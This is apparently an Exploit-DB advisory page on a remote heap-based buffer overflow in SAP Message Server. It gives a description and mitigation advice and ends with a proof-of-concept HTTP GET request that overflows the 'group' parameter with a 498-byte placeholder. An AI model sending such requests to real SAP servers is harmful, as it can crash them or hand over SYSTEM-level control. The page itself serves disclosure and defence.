SAP Message Server Remote Heap-based Buffer Overflow Vulnerability

vendor:

SAP Message Server

by:

CVSS

CRITICAL

Remote heap-based buffer-overflow

119

CWE

Product Name: SAP Message Server

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

SAP Message Server Remote Heap-based Buffer Overflow Vulnerability

The SAP Message Server is vulnerable to a remote heap-based buffer overflow. The vulnerability occurs due to inadequate boundary checks on user-supplied data before copying it to a buffer of insufficient size. Remote attackers can exploit this vulnerability to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers, while failed attacks may cause denial-of-service conditions disabling all functionality of the application.

Mitigation:

It is recommended to apply the latest patches and updates provided by the vendor to mitigate this vulnerability. Additionally, network-level controls such as firewalls can help prevent remote exploitation.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24765/info

SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.

Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application. 

GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)
Host: sapserver:8100
Proxy-Connection: Keep-Alive